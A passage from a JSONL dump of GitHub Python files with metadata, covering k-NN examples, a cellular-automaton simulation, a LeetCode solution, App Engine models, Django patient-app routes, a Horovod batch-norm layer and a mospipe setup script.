shown on the right side of Figure 2-1), and using many neighbors corresponds to low model complexity (as shown on the left side of Figure 2-1). If you consider the extreme case where the number of neighbors is the number of all data points in the training set, each test point would have exactly the same neighbors (all training points) and all predictions would be the same: the class that is most frequent in the training set.\n\"\"\"\n\n\n# Cancer data\nX_cancer, y_cancer, fn_cancer, tn_cancer = ld.load_cancer()\nX_cancer_train, X_cancer_test, y_cancer_train, y_cancer_test = train_test_split(X_cancer, y_cancer, stratify=y_cancer, random_state=42)\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\ntrain_acc = []\ntest_acc = []\nK = range(1,15)\nfor k in K:\n knc = KNeighborsClassifier(n_neighbors=k)\n knc.fit(X_cancer_train, y_cancer_train)\n train = knc.score(X_cancer_train, y_cancer_train)\n train_acc.append(train)\n test = knc.score(X_cancer_test, y_cancer_test)\n test_acc.append(test)\n\n# Plot the elbow\nplt.plot(K, train_acc, label='Train')\nplt.plot(K, test_acc, label='Test')\nplt.xlabel('k')\nplt.ylabel('Acc')\nplt.title('Train acc vs. Test acc')\nplt.legend()\nplt.show()\n\n\n# Making regression model for wave dataset\nX_wave, y_wave = ld.load_wave(visualize=False)\nX_wave_train, X_wave_test, y_wave_train, y_wave_test = train_test_split(X_wave, y_wave, random_state=0)\nknr = KNeighborsRegressor(n_neighbors=3)\nknr.fit(X_wave_train, y_wave_train)\nprint(f'R^2 score: {knr.score(X_wave_test, y_wave_test)}')\n\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\nfig, axes = plt.subplots(1, 3)\n# create 1,000 data points, evenly spaced between -3 and 3\nline = np.linspace(-3, 3, 1000).reshape(-1, 1)\nfor n_neighbors, ax in zip([1, 3, 9], axes):\n # make predictions using 1, 3, or 9 neighbors\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\n reg.fit(X_wave_train, y_wave_train)\n ax.plot(line, reg.predict(line))\n ax.plot(X_wave_train, y_wave_train, '^', c=mglearn.cm2(0), markersize=4)\n ax.plot(X_wave_test, y_wave_test, 'v', c=mglearn.cm2(1), markersize=4)\n ax.set_title(\n \"{} neighbor(s)\\n train score: {:.2f} test score: {:.2f}\".format(\n n_neighbors, reg.score(X_wave_train, y_wave_train),\n reg.score(X_wave_test, y_wave_test)))\n ax.set_xlabel(\"Feature\")\n ax.set_ylabel(\"Target\")\naxes[0].legend([\"Model predictions\", \"Training data/target\",\n\"Test data/target\"], loc=\"best\")\n\n\n","repo_name":"vkyprmr/projectGain","sub_path":"LiteratureGain/intro2ml_wpython/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35031749629","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n ans = []\n def traverse(root):\n if root is None:\n return []\n queue = deque()\n queue.append([root,1])\n while queue:\n curr, depth = queue.popleft()\n ans.append([curr.val,depth])\n if curr.left is not None:\n queue.append([curr.left,depth+1])\n if curr.right is not None:\n queue.append([curr.right,depth+1])\n traverse(root)\n if len(ans)==0:\n return []\n result = [[ans[0][0]]]\n curr_depth = ans[0][1]\n for node_val, depth in ans[1:]:\n if depth==curr_depth:\n result[-1].append(node_val)\n else:\n curr_depth = depth\n result.append([node_val])\n\n return result\n\n ","repo_name":"ABHISHEKVALSAN/leetcode","sub_path":"0102-binary-tree-level-order-traversal/0102-binary-tree-level-order-traversal.py","file_name":"0102-binary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34086332991","text":"\"\"\"programme d'exemple où l'on calcule les proportions de population en fonction de toutes les valeurs\r\nde survie possibles. Les données seront représentées graphiquement par le programme exemple_plot.py\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import sqrt\r\n\r\n\r\ndef first_gen(proportion, shape):\r\n \"\"\" retourne un vecteur mélangé à une dimension contenant un nombre de 1\r\n correspondant à la proportion donnée en input\r\n input :\r\n proportion : proportion d'occupation de la grille par la population initiale\r\n\r\n shape : la forme de la matrice, qui peut ne pas être carrée\r\n\r\n output :\r\n population, vecteur de population initiale mélangé\"\"\"\r\n\r\n population = np.zeros(shape)\r\n population[1:-1, 1:-1] = np.random.binomial(1, proportion, (shape[0]-2, shape[1]-2)) #on insère des 1 dans une matrice plus petite pour ne pas gérer les bords\r\n #[1:-1] pour s'arrêter à l'avant dernière ligne/colonne\r\n return population\r\n\r\ndef next_generation(pop, nb_survie, nb_surpopulation, nb_naissance) :\r\n \"\"\"renvoie la nouvelle génération n+1 à partir de pop en input\"\"\"\r\n new = np.zeros(pop.shape) #création next generation remplie de 0. pop.shape pour avoir meme forme\r\n for ligne in range(1, pop.shape[0] - 1):\r\n for colonne in range (1, pop.shape[1] - 1):\r\n compteur_vie = scan(ligne,colonne, pop)\r\n if pop[ligne,colonne] == 1 :\r\n if compteur_vie < nb_survie:\r\n new[ligne,colonne] = 0\r\n elif nb_survie <= compteur_vie < nb_surpopulation:\r\n new[ligne,colonne] = 1\r\n elif compteur_vie >= nb_surpopulation :\r\n new[ligne,colonne] = 0\r\n else:\r\n if compteur_vie >= nb_naissance :\r\n new[ligne,colonne] = 1\r\n\r\n return new\r\n\r\ndef final_generations(pop, nb_survie, nb_surpopulation, nb_naissance, NB_GENERATION):\r\n \"\"\"renvoie la dernière generation des n generations définies au préalable\"\"\"\r\n for i_generation in range(NB_GENERATION):\r\n pop = next_generation(pop, nb_survie, nb_surpopulation, nb_naissance)\r\n if np.mean(pop) == 0:\r\n break\r\n return pop\r\n\r\ndef scan(m,n, pop):\r\n \"\"\"scanne les 8 cellules environnantes et renvoie le nombre de cellules vivantes\"\"\"\r\n return np.sum(pop[(m-1):(m+2), (n-1) : (n+2)]) - pop[m,n]\r\n\r\n\r\ndef proportion_moyenne(nb_survie, nb_surpopulation, nb_naissance , proportion_initiale, TAILLE_GRILLE):\r\n \"\"\"renvoie la proportion moyenne de la population finale après N générations\"\"\"\r\n pop = first_gen(proportion_initiale, TAILLE_GRILLE)\r\n final_gen = final_generations(pop, nb_survie, nb_surpopulation, nb_naissance, NB_GENERATION)\r\n return np.mean(final_gen)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n TAILLE_GRILLE = (100,100)\r\n NB_SURVIES = range(1,9)\r\n NB_SURPOPULATION = [3,4]\r\n NB_NAISSANCE = [3]\r\n PROP_INITIALE = [0.4, 0.5]\r\n N_SIM = 100\r\n NB_GENERATION = 20\r\n DECOMPTE_MESURES = len(NB_SURVIES)*len(NB_SURPOPULATION)*len(NB_NAISSANCE)*len(PROP_INITIALE)*N_SIM\r\n\r\n stats = np.zeros((len(NB_SURVIES),len(NB_SURPOPULATION), len(NB_NAISSANCE), len(PROP_INITIALE), N_SIM))\r\n\r\n compteur = 0\r\n for i_surv, nb_survie in enumerate(NB_SURVIES):\r\n for i_surpop, nb_surpopulation in enumerate(NB_SURPOPULATION):\r\n for i_naiss, nb_naissance in enumerate(NB_NAISSANCE):\r\n for i_prop, proportion_initiale in enumerate(PROP_INITIALE):\r\n for i_sim in range(N_SIM):\r\n stats[i_surv, i_surpop, i_naiss, i_prop, i_sim] = proportion_moyenne(nb_survie, nb_surpopulation, nb_naissance , proportion_initiale, TAILLE_GRILLE)\r\n compteur += 1\r\n print(f'{round(compteur*100/DECOMPTE_MESURES, 2)}% prop = {stats[i_surv, i_surpop, i_naiss, i_prop, i_sim]}')\r\n #utile pour voir la progression de l'algorithme\r\n\r\nstats.dump(\"matrice_test_plot.txt\")\r\n\r\nprint(\"\"\"\r\nFIN\r\n\"\"\")\r\n","repo_name":"lejugeti/PARIZE_PCBS_cellular_automata","sub_path":"exemple_de_graphs/exemple_cell_auto.py","file_name":"exemple_cell_auto.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31633416226","text":"from google.appengine.ext import db as datastore\n\n\nclass Experiment(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n aws_access_key_id = datastore.StringProperty()\n aws_secret_access_key = datastore.StringProperty()\n aws_hostname = datastore.StringProperty()\n hit_id = datastore.StringProperty()\n hit_title = datastore.StringProperty()\n hit_description = datastore.StringProperty()\n hit_lifetime = datastore.IntegerProperty()\n hit_max_assignments = datastore.IntegerProperty()\n hit_keywords = datastore.StringListProperty()\n hit_duration = datastore.IntegerProperty()\n hit_approval_delay = datastore.IntegerProperty()\n hit_frame_height = datastore.IntegerProperty()\n t1_image_url = datastore.StringProperty()\n t1_reward = datastore.IntegerProperty()\n t2_image_url = datastore.StringProperty()\n group_count = datastore.IntegerProperty()\n group_index = datastore.IntegerProperty()\n\n\nclass Group(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n experiment = datastore.ReferenceProperty(Experiment)\n nickname = datastore.StringProperty()\n opening_bid = datastore.IntegerProperty()\n accept_thresh = datastore.IntegerProperty()\n reject_thresh = datastore.IntegerProperty()\n alpha = datastore.FloatProperty()\n\n\nclass Worker(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n id = datastore.StringProperty()\n assignment_id = datastore.StringProperty()\n group = datastore.ReferenceProperty(Group)\n\n\nclass Labeling(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n image_url = datastore.StringProperty()\n worker = datastore.ReferenceProperty(Worker)\n labels = datastore.StringListProperty()\n time = datastore.IntegerProperty()\n\n\nclass Negotiation(datastore.Model):\n created = datastore.DateTimeProperty(auto_now_add=True)\n worker = datastore.ReferenceProperty(Worker)\n first_offer = datastore.IntegerProperty()\n first_offer_accepted = datastore.BooleanProperty(default=False)\n first_offer_rejected = datastore.BooleanProperty(default=False)\n counter_offer = datastore.IntegerProperty()\n counter_offer_accepted = datastore.BooleanProperty(default=False)\n counter_offer_rejected = datastore.BooleanProperty(default=False)\n second_offer = datastore.IntegerProperty()\n second_offer_accepted = datastore.BooleanProperty(default=False)\n second_offer_rejected = datastore.BooleanProperty(default=False)\n","repo_name":"johnjosephhorton/Hagglebot","sub_path":"gae_upload/hagglebot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"29386763108","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom .data_processing import preprocess_data\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\ndef train_knn_classifier(data, labels, n_neighbors=5):\n \"\"\"\n Train K-NN classifier on the given data.\n\n Args:\n data (pd.DataFrame): Data to train the classifier on.\n labels (pd.Series): Labels associated with the data.\n n_neighbors (int, optional): Number of neighbors to use for classification. Defaults to 5.\n\n Returns:\n KNeighborsClassifier: Trained K-NN classifier.\n \"\"\"\n knn = KNeighborsClassifier(n_neighbors=n_neighbors)\n knn.fit(data, labels)\n return knn\n\n\ndef make_prediction(knn, new_data):\n \"\"\"\n Make a prediction using the trained K-NN classifier.\n\n Args:\n knn (KNeighborsClassifier): Trained K-NN classifier.\n new_data (np.array): New input data to make predictions.\n\n Returns:\n int: Predicted label for the new data.\n \"\"\"\n # Ensure the input data is a 2D array\n new_data = np.array(new_data).reshape(1, -1)\n prediction = knn.predict(new_data)\n return prediction\n\n\ndef find_best_k(data, labels, k_range):\n \"\"\"\n Find the optimal k value for K-NN classifier.\n\n Args:\n data (pd.DataFrame): Data to train the classifier on.\n labels (pd.Series): Labels associated with the data.\n k_range (range): Range of k values to test.\n\n Returns:\n int: Optimal k value.\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(\n data, labels, test_size=0.3, random_state=42\n )\n\n best_k = 0\n best_score = 0\n\n for k in k_range:\n knn = train_knn_classifier(X_train, y_train, n_neighbors=k)\n y_pred = make_prediction(knn, X_test)\n score = accuracy_score(y_test, y_pred)\n\n if score > best_score:\n best_score = score\n best_k = k\n\n return best_k\n","repo_name":"Lozan20/inteligentneSystemy","sub_path":"car_repair_app/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70150620260","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass ReadabilityCNN(nn.Module):\n def __init__(self, in_channel=3, dropout=.25):\n super(ReadabilityCNN, self).__init__()\n\n def discriminator_block(in_filters, out_filters, normalize=True):\n layers = [nn.Conv2d(in_filters, out_filters, 4, 2, 1)]\n layers.append(nn.Dropout2d(p = dropout))\n\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.1))\n\n return layers\n\n self.hidden_layers = nn.Sequential(\n *discriminator_block(in_channel, 64, normalize=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 256),\n nn.ZeroPad2d((1, 0, 1, 0)),\n )\n self.outputLayer = nn.Conv2d(256, 1, 7, padding=1, bias=False)\n\n def forward(self, generatorOutput):\n hidden_layers_output = self.hidden_layers(generatorOutput)\n readability_score = self.outputLayer(hidden_layers_output)\n\n readability_score = readability_score.reshape((readability_score.shape[0],1))\n\n return readability_score\n","repo_name":"erichmond33/Attr2MDfont","sub_path":"readabilityCNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5542794218","text":"import wx\n\nfrom application import schema, dialogs\nfrom i18n import MessageFactory\nfrom osaf.framework.blocks.Block import Block\nfrom osaf.framework.blocks import BlockEvent, ChoiceEvent, MenuItem, Menu\n\nfrom debug.generate import GenerateAllItems\nfrom debug.GenerateItemsFromFile import GenerateItems\nfrom debug.mail import loadMailTests\nfrom wx import xrc\nimport debug.generate_dialog.ItemGenerator as itemGenerator\n\n_ = MessageFactory(\"Chandler-debugPlugin\")\n\n\nclass TestMenuHandler(Block):\n\n def setStatusMessage(self, msg):\n Block.findBlockByName('StatusBar').setStatusMessage(msg)\n\n def on_debug_GenerateDataEvent(self, event):\n # triggered from \"Tools | Test | Generate Data\" and\n # \"Tools | Test | Generate Lots of Data\" menu items\n\n if event.arguments['sender'].blockName == '_debug_GenerateMuchDataItem':\n count = 100\n else:\n count = 4\n\n view = self.itsView\n sidebarCollection = schema.ns(\"osaf.app\", view).sidebarCollection\n\n return GenerateAllItems(view, count, sidebarCollection)\n\n def on_debug_GenerateDataFromFileEvent(self, event):\n # triggered from \"Tools | Test | Generate Items from a File\" menu\n\n res = dialogs.Util.showFileDialog(wx.GetApp().mainFrame,\n _(u\"Choose a file to import\"), \"\",\n _(u\"import.csv\"),\n _(u\"CSV files|*.csv\"),\n wx.OPEN)\n cmd, dir, filename = res\n if cmd != wx.ID_OK:\n self.setStatusMessage(_(u\"Import aborted.\"))\n return\n\n self.setStatusMessage(_(u\"Importing from %(filename)s.\")\n %{'filename': filename})\n\n return GenerateItems(self.itsView, os.path.join(dir, filename))\n \n def on_debug_GenerateDataFromDialogEvent(self, event):\n # triggered from \"Tools | Test | Generate Items from dialog\" menu\n itemGenerator.show()\n \n def on_debug_MimeTestEvent(self, event):\n loadMailTests(self.itsView, \"mime_tests\")\n\n def on_debug_i18nMailTestEvent(self, event):\n loadMailTests(self.itsView, \"i18n_tests\")\n\n\ndef makeTestMenu(parcel, toolsMenu):\n\n handler = TestMenuHandler.update(parcel, None,\n blockName='_debug_TestMenuHandler')\n\n generateDataEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateData',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n generateDataFromFileEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateDataFromFile',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n generateDataFromDialogEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_GenerateDataFromDialog',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n mimeTestEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_MimeTest',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n i18nMailTestEvent = \\\n BlockEvent.update(parcel, None,\n blockName='_debug_i18nMailTest',\n dispatchEnum='SendToBlockByReference',\n destinationBlockReference=handler)\n\n testMenu = Menu.update(parcel, None,\n blockName='_debug_testMenu',\n title=_(u'&Test'),\n parentBlock=toolsMenu)\n\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateSomeDataItem',\n title=_(u'&Generate Data'),\n helpString=_(u'generates a few items of each kind'),\n event=generateDataEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateMuchDataItem',\n title=_(u'G&enerate Lots of Data'),\n helpString=_(u'generates many items of each kind'),\n event=generateDataEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateDataItemFromFile',\n title=_(u'Generate Items from a &File'),\n helpString=_(u'generates items from a file'),\n event=generateDataFromFileEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_GenerateDataFromDialog',\n title=_(u'Generate Items from a &Dialog'),\n helpString=_(u'choose items to generate from a dialog'),\n event=generateDataFromDialogEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_test_separator_1',\n menuItemKind='Separator',\n parentBlock=testMenu)\n\n MenuItem.update(parcel, None,\n blockName='_debug_MimeTest',\n title=_(u'Load MIME &Torture Tests'),\n helpString=_(u'Loads real world complex / broken mime message examples provided by Anthony Baxter'),\n event=mimeTestEvent,\n parentBlock=testMenu)\n MenuItem.update(parcel, None,\n blockName='_debug_i18nMailTest',\n title=_(u'Load i18n &Mail Tests'),\n helpString=_(u'Loads mail messages containing a variety of Charsets and Languages'),\n event=i18nMailTestEvent,\n parentBlock=testMenu)\n","repo_name":"owenmorris/chandler","sub_path":"chandler/projects/Chandler-debugPlugin/debug/TestMenu.py","file_name":"TestMenu.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"35"} +{"seq_id":"2785673342","text":"import time \n\n\ndef fibo_naive(n):\n\tif n<=2:\n\t\tf = 1\n\telse:\n\t\tf = fibo_naive(n-1) + fibo_naive(n-2)\n\treturn f\n\n#start_time = time.time()\n#fibo_naive(10)\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\n\ndef fibo_memo(n):\n\tmemo={}\n\tif n in memo:\n\t\treturn memo[n]\n\tif n<=2:\n\t\tf=1\n\telse:\n\t\tf = fibo_memo(n-1) + fibo_memo(n-2)\n\t\tmemo[n] = f\n\treturn f\n\n#start_time = time.time()\n#fibo_memo(40)\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\ndef fibo_opti(n):\n\tfib={}\n\tfor k in range(n):\n\t\tk+=1\n\t\tif k<=2:\n\t\t\tf = 1\n\t\telse:\n\t\t\tf = fib[k-1] + fib[k-2] \n\t\tfib[k] = f\n\treturn fib[n]\n\nstart_time = time.time()\nfibo_opti(1000)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n\n\n","repo_name":"nestorghh/coding_interview","sub_path":"cracking/DP/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71662394021","text":"board = [[5, 5, 5, 5, 5], [5, 5, 5, 5, 5], [5, 5, 5, 5, 5], [5, 5, 5, 5, 5]]\nskill = [[1, 0, 0, 3, 4, 4], [1, 2, 0, 2, 3, 2], [2, 1, 0, 3, 1, 2], [1, 0, 1, 3, 3, 1]]\n\n\ndef solution(board, skill):\n answer = 0\n lst = [[0] * (len(board[0]) + 1) for _ in range(len(board) + 1)]\n\n for i in skill:\n size = i[-1]\n if i[0] == 1:\n type = -1\n else:\n type = 1\n # 시작\n lst[i[1]][i[2]] += size * type\n # 시작점 끝\n lst[i[1]][i[4] + 1] -= size * type\n # 끝점 시작\n lst[i[3] + 1][i[2]] -= size * type\n # 끝\n lst[i[3] + 1][i[4] + 1] += size * type\n\n for i in range(len(board)):\n for j in range(1, len(board[0])):\n lst[i][j] += lst[i][j - 1]\n\n for i in range(len(board[0])):\n for j in range(1, len(board)):\n lst[j][i] += lst[j - 1][i]\n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] += lst[i][j]\n if board[i][j] > 0:\n answer += 1\n return answer\n\n\nprint(solution(board, skill))\n","repo_name":"Lee-hyeonkyu/co-te","sub_path":"파괴되지 않은 건물.py","file_name":"파괴되지 않은 건물.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30509028511","text":"import sys\nfrom regmaxsn.core.iterativeRegistration import IterativeRegistration\nfrom regmaxsn.core.misc import parFileCheck\nimport os\nimport pathlib as pl\n\n\ndef runRegMaxS(parFile, parNames):\n parsList = parFileCheck(parFile, parNames)\n\n for pars in parsList:\n print('Current Parameters:')\n for parN, parV in pars.items():\n print(('{}: {}'.format(parN, parV)))\n\n resFile = pars['resFile']\n refSWC = pars['refSWC']\n testSWC = pars['testSWC']\n\n res_filepath = pl.Path(resFile)\n if res_filepath.is_file():\n\n ch = input('File exists: ' + resFile + '\\nDelete(y/n)?')\n if ch == 'y':\n res_filepath.unlink()\n else:\n quit()\n\n res_filepath.parent.mkdir(exist_ok=True)\n\n assert pl.Path(refSWC).is_file(), 'Could not find {}'.format(refSWC)\n assert pl.Path(testSWC).is_file(), 'Could not find {}'.format(testSWC)\n\n iterReg = IterativeRegistration(refSWC=pars['refSWC'],\n gridSizes=pars['gridSizes'],\n rotBounds=pars['rotBounds'],\n transBounds=pars['transBounds'],\n transMinRes=pars['transMinRes'],\n scaleMinRes=pars['minScaleStepSize'],\n rotMinRes=pars['rotMinRes'],\n nCPU=pars['nCPU'])\n\n iterReg.performReg(SWC2Align=pars['testSWC'],\n resFile=pars['resFile'],\n scaleBounds=pars['scaleBounds'],\n inPartsDir=pars['inPartsDir'],\n outPartsDir=pars['outPartsDir'],\n retainTempFiles=pars['retainTempFiles'])\n\n\nif __name__ == '__main__':\n\n from regmaxsn.core.RegMaxSPars import RegMaxSParNames\n assert len(sys.argv) == 2, 'Improper usage! Please use as \\'python RegMaxS.py parFile\\''\n\n parFile = sys.argv[1]\n\n runRegMaxS(parFile, RegMaxSParNames)\n","repo_name":"wachtlerlab/Reg-MaxS","sub_path":"regmaxsn/scripts/algorithms/RegMaxS.py","file_name":"RegMaxS.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72315283621","text":"\nfrom django.urls import path\nfrom patient_app import views\n\napp_name='patient_app'\n\nurlpatterns = [\n path('patient_dash/',views.patientDashboard,name='patient_dash'),\n path('patient_profile/',views.patientProfile,name='patient_profile'),\n path('edit_basic//',views.editBasicInfo.as_view(),name='edit_basic'),\n path('edit_parsonal//',views.editPersonalInfo.as_view(),name='edit_parsonal'),\n path('find_doctor/',views.findDoctor,name='find_doctor'),\n path('find_catagory_doctor//',views.findDoctorCatagory,name='find_catagory_doctor'),\n path('make_appointmnet//',views.makeAppointment,name='make_appointment'),\n path('confirm_appointment///',views.confirmAppointment,name='confirm_appointment'),\n path('confirm_online_appointment///',views.confirmOnlineAppointment,name='confirm_online_appointment'),\n path('appointment_history/',views.appointmentHistory,name='appointment_history'),\n path('appointment_details//',views.appointmentDetails,name='appointment_details'),\n path('online_appointment_details//',views.onlineAppointmentDetails,name='online_appointment_details'),\n path('confirm_payment//',views.conformPayment,name='confirm_payment'),\n path('recent_prescription/',views.recentPrescription,name='recent_prescription'),\n path('prescription_list/',views.prescriptionList,name='Prescription_list'),\n path('online_prescription_list/',views.onlinePrescriptionList,name='online_Prescription_list'),\n path('prescription_details//',views.prescriptionDetails,name='prescription_details'),\n path('online_prescription_details//',views.onlinePrescriptionDetails,name='online_prescription_details'),\n \n \n\n\n]","repo_name":"Smile-94/My-Doctor-Patient-Management-Systm","sub_path":"patientmanagement/patient_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26759394382","text":"\"\"\"Synchronized batch norm using horovod and keras\"\"\"\nimport tensorflow as tf\nfrom tensorflow.python.keras import backend\nfrom tensorflow.python.keras.layers.normalization import BatchNormalizationBase\nfrom tensorflow.python.util.tf_export import keras_export\nfrom horovod.tensorflow.mpi_ops import _allreduce\nfrom horovod.tensorflow.mpi_ops import size\nfrom horovod.tensorflow.mpi_ops import Sum\n\n\ndef reduce_sum(x):\n return _allreduce(x, op=Sum)\n\n\n# pylint: disable=g-classes-have-attributes\n@keras_export('keras.layers.experimental.SyncBatchNormalizationHorovod', v1=[])\nclass SyncBatchNormalizationHorovod(BatchNormalizationBase):\n r\"\"\"Normalize and scale inputs or activations synchronously across replicas.\n \"\"\"\n\n def __init__(self,\n axis=-1,\n momentum=0.99,\n epsilon=1e-3,\n center=True,\n scale=True,\n beta_initializer='zeros',\n gamma_initializer='ones',\n moving_mean_initializer='zeros',\n moving_variance_initializer='ones',\n beta_regularizer=None,\n gamma_regularizer=None,\n beta_constraint=None,\n gamma_constraint=None,\n **kwargs):\n if kwargs.pop('fused', None):\n raise ValueError(\n '`fused` argument cannot be True for SyncBatchNormalization.')\n\n # Currently we only support aggregating over the global batch size.\n super(SyncBatchNormalizationHorovod, self).__init__(\n axis=axis,\n momentum=momentum,\n epsilon=epsilon,\n center=center,\n scale=scale,\n beta_initializer=beta_initializer,\n gamma_initializer=gamma_initializer,\n moving_mean_initializer=moving_mean_initializer,\n moving_variance_initializer=moving_variance_initializer,\n beta_regularizer=beta_regularizer,\n gamma_regularizer=gamma_regularizer,\n beta_constraint=beta_constraint,\n gamma_constraint=gamma_constraint,\n fused=False,\n **kwargs)\n\n def _calculate_mean_and_var(self, x, axes, keep_dims):\n\n with backend.name_scope('moments'):\n y = tf.cast(x, tf.float32) if x.dtype == tf.float16 else x\n\n # Compute true mean while keeping the dims for proper broadcasting.\n worker_mean = tf.reduce_mean(y, axes, keepdims=True, name='mean')\n worker_variance = tf.reduce_mean(\n tf.math.squared_difference(y, tf.stop_gradient(worker_mean)),\n axes,\n keepdims=True,\n name='variance')\n if size() > 1:\n worker_square_of_mean = tf.math.square(worker_mean)\n worker_mean_of_square = worker_variance + worker_square_of_mean\n group_mean = reduce_sum(worker_mean)\n group_mean_of_square = reduce_sum(worker_mean_of_square)\n group_mean /= size()\n group_mean_of_square /= size()\n group_variance = group_mean_of_square - tf.math.square(group_mean)\n mean, var = group_mean, group_variance\n else:\n mean, var = worker_mean, worker_variance\n\n if not keep_dims:\n mean = tf.squeeze(mean, axes)\n var = tf.squeeze(var, axes)\n if x.dtype == tf.float16:\n return (tf.cast(mean, tf.float16), tf.cast(var, tf.float16))\n else:\n return (mean, var)\n","repo_name":"renmengye/online-unsup-proto-net","sub_path":"fewshot/models/modules/keras_sync_batch_norm.py","file_name":"keras_sync_batch_norm.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"39619894453","text":"#from distutils.core import setup\n#from distutils.extension import Extension\n#\nfrom setuptools import setup\nfrom setuptools.extension import Extension\n\nimport subprocess\n\nimport os\n\n#update version\nargs = 'git describe --tags'\np = subprocess.Popen(args.split(), stdout=subprocess.PIPE)\nlong_version = p.communicate()[0].decode(\"utf-8\").strip()\nspl = long_version.split('-')\n\nif len(spl) == 3:\n main_version = spl[0]\n commit_number = spl[1]\n version_hash = spl[2]\n version = f'{main_version}.dev{commit_number}'\nelse:\n version_hash = '---'\n version = long_version\n \n# version = \"1.0\" # pipeline with database\n\n# Set this to true to add install_requires to setup\n# Turned off for incremental builds as it kills \"reload(mastquery.query)\" \nif 0:\n install_requires=[\n 'astropy>=2.0.0',\n 'scipy',\n 'numpy>=1.10.2',\n 'matplotlib>=2.0.2',\n 'mpdaf>=1.0']\nelse:\n install_requires = [] \n \n#lines = open('grizli/version.py').readlines()\nversion_str =f\"\"\"# git describe --tags\n__version__ = \"{version}\"\n__long_version__ = \"{long_version}\"\n__version_hash__ = \"{version_hash}\"\n\"\"\"\n\nfp = open('mospipe/version.py','w')\nfp.write(version_str)\nfp.close()\nprint('Git version: {0}'.format(version))\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"mospipe\",\n version = version,\n author = \"Gabriel Brammer\",\n author_email = \"gbrammer@gmail.com\",\n description = \"MOSFIRE pipeline\",\n license = \"MIT\",\n url = \"https://github.com/gbrammer/mospipe\",\n download_url = \"https://github.com/gbrammer/mospipe/tarball/{0}\".format(version),\n packages=['mospipe'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Astronomy',\n ],\n install_requires=install_requires,\n package_data={'mospipe': 